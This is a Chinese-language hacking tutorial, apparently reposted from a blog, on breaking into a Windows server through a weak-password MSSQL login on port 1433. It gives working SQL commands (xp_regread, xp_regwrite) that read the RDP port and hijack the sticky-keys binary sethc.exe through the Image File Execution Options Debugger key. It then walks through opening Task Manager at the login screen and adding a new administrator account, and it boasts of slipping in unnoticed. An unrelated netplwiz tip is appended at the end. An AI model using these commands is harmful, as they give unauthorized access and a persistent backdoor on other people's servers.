1433弱口令映像劫持后门快速提权法

提权条件:
1.服务器开启了终端端口(终端端口未必是3389,能够自行查询)
2.服务器的粘滞键功能无损,只要能够正常弹出便可
3.服务器未禁止注册表编辑(即写入功能)

罗嗦一句:1433提权没有一种方法是万能,有时要多种方法结合,管理员的安全意识都在提升,如今没有几年前那么单纯的cmdshll就能提起来的了

开始sqltools登陆目标服务器:
运行工具的dos命令,发现Error Message:xpsql.cpp: 错误 5 来自 CreateProcess（第 737 行）在之前的授渔课程中说过这是cmd.exe的权限被限制了也提供了绕过的方法,在此再也不赘述,请看之前的教程




下面收集下服务器的相关资料和信息,以备提权使用

sql命令查询服务器的版本等相关信息:EXEC xp_msver




因为组件xplog70.dll被删除了,没法显示,下面再看下终端信息

sql命令读取服务器终端端口:exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp','PortNumber'




终端端口为3389,链接测试终端端口,并测试shift粘滞键功能




链接正常,粘滞键测试正常弹出,再去收集下其余信息


 

c盘下有sql的安装目录,这个但是好东西,之前授渔也讲过请自行查阅

下面这里是这课的核心重点了,请十二万分关注
先发布三条命令

1.sql命令查询注册表粘滞键是否被劫持

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

2.sql命令劫持注册表粘滞键功能,替换成任务管理器(固然你也能够替换成你想要的其余命令)

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

3.sql命令删除注册表粘滞键的劫持功能保护你的服务器再也不被他人利用

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

好了,咱们替换后查询一下看看是否正确写入注册表了




查询结果显示正常写入,下面就链接终端,五次shift,弹出可爱的任务管理器了,尊敬的管理员还在上面呢,他还不知道咱们在悄悄的潜入进来了,太好玩了.


 

看下张图,点文件--新建任务,咱们新建个explorer的任务


 

当程序运好后咱们就看到了一个临时的桌面系统了,打开计算管理工具,什么?不会开?那位同窗,你可要补习下电脑系统知识先了,个人电脑上右键,弹出菜单点管理啊

这时咱们找到计算机管理工具里的本地用户和组,打开用户的选项,添加新帐号和密码吧.


 

这里你也能够找到cmd命令去创建用户,固然,这时cmd的权限是被禁用的,还要改权限,比较麻烦,你也能够找其余目录下cmd.exe,有些权限设置得很差的,就能够执行了,这里
咱们就用计算机管理来建立用户,就当是吃快餐面,方便嘛.跑题了跑题了******

接下来干嘛?固然要把新建的帐号添加到管理组了,用脚趾头想的人都知道*^_^*




一切KO了,不对应该是OK了,那么就终端登陆吧,看当作果,嘿嘿,还不错的一台服务器.


 

 

http://www.spiger.cn/article/145.html

 

打开“开始”→“运行”，在“运行”一栏中输入“Rundll32 netplwiz.dll,UsersRunDll”命令打开用户账户窗口（注意区分大小写）